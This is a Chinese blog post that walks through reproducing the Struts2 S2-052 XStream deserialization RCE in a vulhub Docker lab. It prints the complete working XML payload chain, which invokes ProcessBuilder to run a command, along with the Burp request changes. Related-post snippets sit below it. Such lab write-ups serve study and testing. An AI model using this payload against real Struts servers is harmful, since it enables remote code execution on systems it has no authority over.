复现S2-052远程代码执行漏洞

于 2024-07-08 11:17:26 发布
阅读量653 收藏 11
点赞数 23
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_76988512/article/details/140263282
版权

1.1 搭建vulhub环境

  1. git clone https://github.com/vulhub/vulhub.git 下载vulhub。
  2. 安装docker-compose

    1.2 复现S2-052远程代码执行漏洞

    S2-052漏洞原理:

    启用Struts  REST插件并使用XStream组件对XML进行反序列操作时,未对数据进行有效验证,可进行远程代码执行攻击。

    (1) cd vulhub/struts2/s2-052 切换目录。(2) 修改映射端口号为8082(3)docker-compose up -d 启动(4) http://192.168.200.116:8083(5)进入id为3的edit界面,burpsuite抓包。

    (6)send to repeater,修改数据包:

    将Content-Type: application/x-www-form-urlencoded改为Content-Type:

    将请求体内容_method=put&clientName=Bob&amount=33改为:

    <map>

      <entry>

        <jdk.nashorn.internal.objects.NativeString>

          <flags>0</flags>

          <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

            <dataHandler>

              <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

                <is class="javax.crypto.CipherInputStream">

                  <cipher class="javax.crypto.NullCipher">

                    <initialized>false</initialized>

                    <opmode>0</opmode>

                    <serviceIterator class="javax.imageio.spi.FilterIterator">

                      <iter class="javax.imageio.spi.FilterIterator">

                        <iter class="java.util.Collections$EmptyIterator"/>

                        <next class="java.lang.ProcessBuilder">

                          <command>

                            <string>touch</string>

                            <string>temp/hello.txt</string>

                          </command>

                          <redirectErrorStream>false</redirectErrorStream>

                        </next>

                      </iter>

                      <filter class="javax.imageio.ImageIO$ContainsFilter">

                        <method>

                          <class>java.lang.ProcessBuilder</class>

                          <name>start</name>

                          <parameter-types/>

                        </method>

                        <name>foo</name>

                      </filter>

                      <next class="string">foo</next>

                    </serviceIterator>

                    <lock/>

                  </cipher>

                  <input class="java.lang.ProcessBuilder$NullInputStream"/>

                  <ibuffer></ibuffer>

                  <done>false</done>

                  <ostart>0</ostart>

                  <ofinish>0</ofinish>

                  <closed>false</closed>

                </is>

                <consumed>false</consumed>

              </dataSource>

              <transferFlavors/>

            </dataHandler>

            <dataLen>0</dataLen>

          </value>

        </jdk.nashorn.internal.objects.NativeString>

        <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>

      </entry>

      <entry>

        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

      </entry>

    </map>

    点击go:(7) docker ps 查看靶场容器IDdocker exec -it 2096 /bin/bash进入容器。(8)ls /tmp 查看,hello.txt创建成功。

iiiiyan.
关注
  • 23
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
docker复现s2-052远程代码执行漏洞
网安小白的博客
03-29 262
使用docker搭建s2-052远程代码执行漏洞(详细~)
复现S2远程代码执行漏洞
m0_71326960的博客
04-02 556
2.进入s2-052执行docker-compose up -d命令(此处注意端口被占用会出现下载镜像报错,只需要把正在运行的镜像停止进程)6.说明利用成功,会在docker容器内创建文件/tmp/success,执行docker exec -it 容器id bash。点击send发送数据,出现状态码为200,和vulhub出计算结果后,即漏洞复现成功。3.随便上传一个文件,使用burpsuite进行抓包。1.使用docker搭建漏洞环境,进入目标文件夹。1.使用docker搭建漏洞环境。
漏洞复现S2-052 (CVE-2017-9805)
weixin_30526593的博客
11-20 243
一、漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行。 二、受影响版本 Struts2.5 – Struts2.5.12版本 Struts2.3.33版本 三、漏洞POC POST /struts2-rest-sho...
S2-052 漏洞复现
weixin_41082546的博客
10-06 1102
Structs2框架已知的漏洞编号如下: S2-005 S2-009 S2-016 (含S2-013) S2-019 S2-020 S2-021 S2-032 S2-037(含S2-033) DevMode S2-045 S2-046 S2-048 S2-052 S2-055 S2-057 S2-052(CVE-2017-9805)环境: https://gi...
Struts S2-052 漏洞复现
时光凉春衫薄的博客
07-23 1597
最近研究了一下docker 发现这个东西真的是快 漏洞环境许多地方都有现成的省的自己去搭建环境了。可以说真的是便利啊。 这两天又在研究struts2 下了环境做个试验玩玩 通过 docker pull medicean/vulapps:s_struts2_s2-052 下载这个漏洞的环境 查看本地的镜像 将这个镜像运行起来 我将docker的业务端口映射到本机的80端口上 ...
S2-052 远程代码执行漏洞
EC_Carrot的博客
08-12 527
漏洞简介 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md 漏洞复现 访问http://your-ip:8080/orders.xhtml即可看到showcase页面,由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改o
Struts2-052 漏洞复现
Jietewang的博客
10-15 708
前言 struts2应用已是千疮百孔,最近突发奇想想研究一下相关原理和利用情况。s2-052漏洞由lgtm.com的安全研究员汇报,编号为CVE-2017-9805,是一个远程命令执行漏洞漏洞危害程度为高危(Critical)。当用户使用带有 XStream 程序的 Struts REST 插件来处理 XML payloads 时,可能会遭到远程代码执行攻击。 影响版本:Struts 2.5.12 版本,百度说还影响到 2.3.33 版本。 1.环境搭建 本次复现采用ubuntu系统,利用...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1401
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
S2-052】Struts2远程命令执行漏洞(CVE-2017-9805)
Unitue_逆流
10-13 5962
**操作机:**Windows 7**目标IP:**172.16.11.2:8080实验工具: Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架,本次试验主要用到它的抓包改包功能。 Metasploit:一款
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值